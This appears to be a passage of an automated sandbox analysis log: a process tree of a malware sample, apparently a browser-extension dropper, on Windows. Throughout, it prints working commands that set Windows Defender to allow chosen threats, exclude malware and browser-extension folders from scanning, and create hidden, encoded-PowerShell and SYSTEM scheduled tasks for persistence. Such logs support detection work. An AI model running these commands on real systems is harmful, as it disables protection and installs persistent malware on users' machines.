                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:4456
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5044
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:4692
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4368
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:688
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2236
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:3688
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:2892
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3984
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1892
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:1968
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:2100
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4128
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3560
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3060
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GfzXWCCsFRMrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GfzXWCCsFRMrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpnMghYRHBUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpnMghYRHBUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VVgdUZLbU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VVgdUZLbU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XgywPJLnIuIbRuigTDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XgywPJLnIuIbRuigTDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bvOaypMPnvJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bvOaypMPnvJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VhLijRxUJlqjyVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VhLijRxUJlqjyVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RDPbNEzdUsgCtKDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RDPbNEzdUsgCtKDC\" /t REG_DWORD /d 0 /reg:64;"
                                                                2⤵
                                                                • Drops file in System32 directory
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4924
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfzXWCCsFRMrC" /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                    PID:1668
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfzXWCCsFRMrC" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3068
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfzXWCCsFRMrC" /t REG_DWORD /d 0 /reg:64
                                                                    3⤵
                                                                      PID:2720
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpnMghYRHBUn" /t REG_DWORD /d 0 /reg:32
                                                                      3⤵
                                                                        PID:4532
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpnMghYRHBUn" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                          PID:960
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVgdUZLbU" /t REG_DWORD /d 0 /reg:32
                                                                          3⤵
                                                                            PID:4212
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVgdUZLbU" /t REG_DWORD /d 0 /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2488
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:1460
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR" /t REG_DWORD /d 0 /reg:64
                                                                              3⤵
                                                                                PID:3744
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bvOaypMPnvJU2" /t REG_DWORD /d 0 /reg:32
                                                                                3⤵
                                                                                  PID:4892
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bvOaypMPnvJU2" /t REG_DWORD /d 0 /reg:64
                                                                                  3⤵
                                                                                    PID:844
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VhLijRxUJlqjyVVB /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                      PID:2180
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VhLijRxUJlqjyVVB /t REG_DWORD /d 0 /reg:64
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1936
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:2484
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:3912
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2188
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:4456
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4312
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4264
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RDPbNEzdUsgCtKDC /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2656
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RDPbNEzdUsgCtKDC /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4760
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "gJtqTemjp" /SC once /ST 07:25:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                2⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:3688
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "gJtqTemjp"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:452
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "gJtqTemjp"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4692
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "FjXDdrejgGyCBhByH" /SC once /ST 06:46:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RDPbNEzdUsgCtKDC\OgrLWgxFqepUBPX\dEKTWvw.exe\" Pl /kXmLdidgN 385121 /S" /V1 /F
                                                                                                2⤵
                                                                                                • Drops file in Windows directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2160
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "FjXDdrejgGyCBhByH"
                                                                                                2⤵
                                                                                                  PID:3740
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 1052
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:3296
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                1⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3708
                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  2⤵
                                                                                                    PID:1632
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                  1⤵
                                                                                                    PID:4988
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:2720
                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                      1⤵
                                                                                                        PID:1276
                                                                                                      • C:\Windows\Temp\RDPbNEzdUsgCtKDC\OgrLWgxFqepUBPX\dEKTWvw.exe
                                                                                                        C:\Windows\Temp\RDPbNEzdUsgCtKDC\OgrLWgxFqepUBPX\dEKTWvw.exe Pl /kXmLdidgN 385121 /S
                                                                                                        1⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops Chrome extension
                                                                                                        • Drops file in System32 directory
                                                                                                        • Drops file in Program Files directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:2892
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                          2⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3704
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                            3⤵
                                                                                                            • Indirect Command Execution
                                                                                                            PID:4404
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1596
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                5⤵
                                                                                                                  PID:4712
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                              3⤵
                                                                                                              • Indirect Command Execution
                                                                                                              PID:4620
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                4⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3560
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                  5⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4380
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                              3⤵
                                                                                                              • Indirect Command Execution
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1460
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                4⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2488
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                  5⤵
                                                                                                                    PID:2164
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                3⤵
                                                                                                                • Indirect Command Execution
                                                                                                                PID:4892
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                  4⤵
                                                                                                                    PID:1008
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                      5⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:1760
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                  3⤵
                                                                                                                  • Indirect Command Execution
                                                                                                                  PID:1212
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                    4⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1488
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                      5⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:808
                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                        6⤵
                                                                                                                          PID:1692
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /DELETE /F /TN "bHuqaEPbhrVtHIaGbF"
                                                                                                                  2⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5024
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                  2⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:3740
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                    3⤵
                                                                                                                    • Indirect Command Execution
                                                                                                                    PID:516
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:1528
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                        5⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3248
                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                          6⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1712
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VVgdUZLbU\LzDUDB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PNYixZeXsqZpVKW" /V1 /F
                                                                                                                  2⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:4752
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
